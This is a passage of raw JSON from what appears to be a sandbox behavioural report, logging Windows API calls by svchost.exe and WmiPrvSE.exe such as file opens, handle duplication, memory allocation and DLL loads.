"caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000f14" }, { "name": "SourceHandle", "value": "0x00000500" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000a5c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-11-20 11:00:00,011", "thread_id": "324", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000f0c" }, { "name": "SourceHandle", "value": "0x00000500" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000a5c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-11-20 11:00:00,651", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000e94" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-11-20 11:00:10,636", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000083c" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-11-20 11:00:20,651", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000008b8" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-11-20 11:00:30,651", "thread_id": "4640", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000f10" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 2, "id": 20 }, { "timestamp": "2025-11-20 11:01:00,011", "thread_id": "4640", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000008b8" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-11-20 11:01:00,011", "thread_id": "324", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000ab8" }, { "name": "SourceHandle", "value": "0x000006e8" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000083c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-11-20 11:01:00,011", "thread_id": "324", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000f08" }, { "name": "SourceHandle", "value": "0x000006e8" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000083c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-11-20 11:01:00,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000e5c" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-11-20 11:01:10,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000ab8" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-11-20 11:01:20,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000e5c" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-11-20 11:01:30,651", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000008bc" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 1, "id": 27 } ], "threads": [ "912", "324", "2872", "4640" ], "environ": { "UserName": "￑￈￑ᅭᅤᅩ￀", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff630560000", "MainExeSize": "0x00010000", "Bitness": "64-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 3164, "process_name": "WmiPrvSE.exe", "parent_id": 740, "module_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "first_seen": "2025-11-20 10:58:31,585", "calls": [ { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "3424", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9cc000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafca74", "parentcaller": "0x7ff79aafc74d", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x7ffee1660000" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1260", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0f6000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafca74", "parentcaller": "0x7ff79aafc74d", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000001f4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafca74", "parentcaller": "0x7ff79aafc74d", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000001f8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2d8d0000" }, { "name": "SectionOffset", "value": "0x3f67acf000" }, { "name": "ViewSize", "value": "0x00338000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc96b", "parentcaller": "0x7ff79aafc762", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\SystemResources\\USER32.dll.mun" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc96b", "parentcaller": "0x7ff79aafc762", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9cd000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc99f", "parentcaller": "0x7ff79aafc762", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000001fc" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\USER32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc99f", "parentcaller": "0x7ff79aafc762", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000200" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c030000" }, { "name": "SectionOffset", "value": "0x3f67ace480" }, { "name": "ViewSize", "value": "0x00005000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000200" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\rpcss.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000204" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c100000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00143000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c100000" }, { "name": "RegionSize", "value": "0x00143000" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000208" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\kernel.appcore.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000020c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedea70000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00012000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\kernel.appcore" }, { "name": "DllBase", "value": "0x7ffedea70000" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000020c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1390000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00082000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-11-20 10:58:31,632", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\bcryptPrimitives" }, { "name": "DllBase", "value": "0x7ffee1390000" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000214" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "\\Device\\CNG" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc378", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9cf000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc5a5", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9d5000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc5a5", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9d7000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc5a5", "parentcaller": "0x7ff79aafb501", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9d9000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc60b", "parentcaller": "0x7ff79aafb501", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\clbcatq" }, { "name": "DllBase", "value": "0x7ffee2c20000" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc60b", "parentcaller": "0x7ff79aafb501", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "0000034B-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "0000015B-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc2ca", "parentcaller": "0x7ff79aafb513", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000254" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c060000" }, { "name": "SectionOffset", "value": "0x3f67acf430" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1b9", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0f7000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1b9", "parentcaller": "0x7ff79aafb518", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x21e2b9a0150" }, { "name": "DesiredAccess", "value": "0xc0100080", "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "0" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 9, "id": 26 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1b9", "parentcaller": "0x7ff79aafb518", "category": "threading", "api": "CreateRemoteThreadEx", "status": true, "return": "0x00000270", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartRoutine", "value": "0x7ffed94d3ca0" }, { "name": "Parameter", "value": "0x21e2b9da610" }, { "name": "CreationFlags", "value": "0x00000000" }, { "name": "ThreadId", "value": "4100" }, { "name": "ProcessId", "value": "3164" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c100000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c100000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9dc000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9dd000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c102000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c103000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9de000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", 